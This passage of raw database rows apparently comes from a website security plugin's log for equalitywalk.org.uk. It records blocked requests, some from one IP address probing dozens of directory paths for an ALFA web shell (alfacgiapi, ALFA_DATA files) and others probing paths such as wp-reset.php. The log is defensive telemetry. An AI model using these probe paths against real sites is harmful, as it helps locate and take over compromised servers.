Safari\\/537.36\"}','wDY4B1Rb2I6dapZz0Phto9KU',0,1674295844.7563,116,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','axXL2NcDb3RkiGTdH7eZyKEs',0,1674295845.0424,103,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HORAs5SoTjDuaQG0tcLJmfEK',0,1674295847.0666,129,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0ln26fBTYaWERJmuxFvKgrSI',0,1674295847.3660,98,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','nlusVoPZz4U2F3i7r1IM6D5H',0,1674295847.6335,121,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PEBwSl0dKjquYb12Tetfrv97',0,1674295849.6426,98,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qNAp91aIK4gCuPXtRd2yxnr6',0,1674295849.9493,491,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','gABQIXwPxTK18lJWVLaDsrMR',0,1674295850.6295,108,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8G6nWfcrOuEJjhtvzxb7Riq9',0,1674295852.6254,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ZtJINufXzvV3RxTn8O0mogG9',0,1674295852.9004,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Y5wczByf8SaTC26deGIoqbiU',0,1674295853.1954,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ZUHYeX69W3zroxFBMRilfa7A',0,1674295855.2055,86,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','D2NpOLwnqlGAV7hMZ1UK9Ick',0,1674295855.4690,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','FhyXRmCEn1kPq9xub6IAc47N',0,1674295855.7460,97,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','uxZXSVrc0J9NQUGC6RKHBkwz',0,1674295857.6897,105,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','fp7eNmq0B5uiwozsVj8PxhZd',0,1674295857.9710,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9kFNP45lDKCRZ8AeTQticqdh',0,1674295858.2428,106,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vWsBDypOeacK4XS3PT0859g1',0,1674295860.1535,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','p72ihTZG0v5PJwxUKbryQzqA',0,1674295860.4326,108,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6B1Yq8aAeIdzh5PMKvuNr9xE',0,1674295860.9413,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','htT8iGbRKH5nFDAOmM3rwWvz',0,1674295862.8656,118,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','yHXuJrN7zj0PC6tGeaBUqcEk',0,1674295863.1658,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BZEi0S3PtgaARe7MyvlHwdO2',0,1674295863.7188,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','o5HbeUhSXGFvaJ3WwyT8IQdm',0,1674295865.7148,124,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','jFzlfqEibw856aHWytk34g97',0,1674295866.0085,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','tePMkgqdhwxD0BzQVFWU3RCr',0,1674295866.2996,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0ZbFWSEtRisCaq1J2fUhrMkj',0,1674295868.2635,133,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KxzX5uway2SCWrNEoPRJDnGp',0,1674295868.5772,121,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','tpSwY9LxvOKzQAcdl2yDEjrg',0,1674295868.8677,123,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','iz7P4xuKRnHs6LyAEDv9eF82',0,1674295870.8696,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PJiR4ycdoS1FEzuAqZGXDLng',0,1674295871.1565,149,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zVF0MWUvbPihqr5xmfQcjODH',0,1674295871.5028,113,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','OnslBEMhZ5jxCdUc284ztF0r',0,1674295873.5144,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','s1Vdg8w6NhGrUjTAma2Zxq3v',0,1674295873.7904,120,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','jZNpdIHCE8mAbPsV3cnRwqtX',0,1674295874.1522,88,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wn41Kzurqs69gNGQRxhHX30m',0,1674295876.0483,97,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','OxiG17zsCIpZJ6TVf4oARcWu',0,1674295876.3697,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','VKTesD2q9Ejh4Ac1036tdRX7',0,1674295876.6389,113,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','danJvrV8ufA4lT6FXoQs7pO0',0,1674295878.6186,105,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','w3OJrIRPcLHj8q2GYAQf7a1D',0,1674295878.9190,124,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2XHZ9mAcebCPopi5BgE1rw6L',0,1674295879.2197,120,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','RortCWg7Yz6cM9Hfuk2OGnhP',0,1674295881.2553,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','uvYK5bydironN8sH3XUS19AL',0,1674295881.5279,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6Jxm5PALnzcliWO7XDFgfvKR',0,1674295881.7903,100,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BAQCx5v2r3moNaZ80SqPWGy1',0,1674295883.6673,107,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oubQacWCwdNzUZvAO4E2Vfeg',0,1674295883.9658,98,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mxF6ekbdwCErcRKlp70jZ4iU',0,1674295884.2445,104,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HNcKg72pmQF6TIfuWMZnw8xl',0,1674295886.2052,121,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','QZulNpG6cUx7YetmK10o4yBR',0,1674295886.5087,99,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HUgKm7bvcrVaRnpouPjBIy3q',0,1674295886.7982,104,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','D9vzJEUAX6BaLclOCYsgRH7M',0,1674295888.7982,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YajhvLPR3trCzEVlkDqUmSio',0,1674295889.0686,112,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6lTNdQtmkVI1xaCMREWYjhUv',0,1674295889.3568,135,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Q06veMVP4qy5mjXC8OFbKS9Z',0,1674295891.3694,122,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','bKrAIdv7H1cRXgCLsBtqPoVS',0,1674295891.6864,89,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9YEn6Gst5AJV8hT4ejfXO0Mw',0,1674295891.9440,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','CRZFYEnd5rhNoGMU1weIzksg',0,1674295894.5445,151,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zbIZCWBQUhMeSDpLEnVrKAko',0,1674295894.8708,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','bkCULQised3P1DTJqGuIK4a0',0,1674295895.1403,94,'','GET',403,0,700,0,1,'',0),('161.35.88.91',2703448155,'','https://www.equalitywalk.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Qs3jI9FVYzgxiW81yJwGvuDr',0,1674304630.6493,2240,'','GET',403,0,700,0,1,'',0),('107.189.162.58',1807589946,'','https://equalitywalk.org.uk/default.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/default.php\"}','Ld6DC9BGYSg2V0F8HZqv7TmE',0,1674311008.4118,211,'','GET',403,0,700,0,1,'',0),('107.189.162.58',1807589946,'','https://equalitywalk.org.uk/default.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/default.php\"}','GiWXkx10s8otnN2aH67FDfw4',0,1674311013.5375,262,'','GET',403,0,700,0,1,'',0),('108.167.189.76',1822932300,'','https://equalitywalk.org.uk/wp-includes/assets/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) 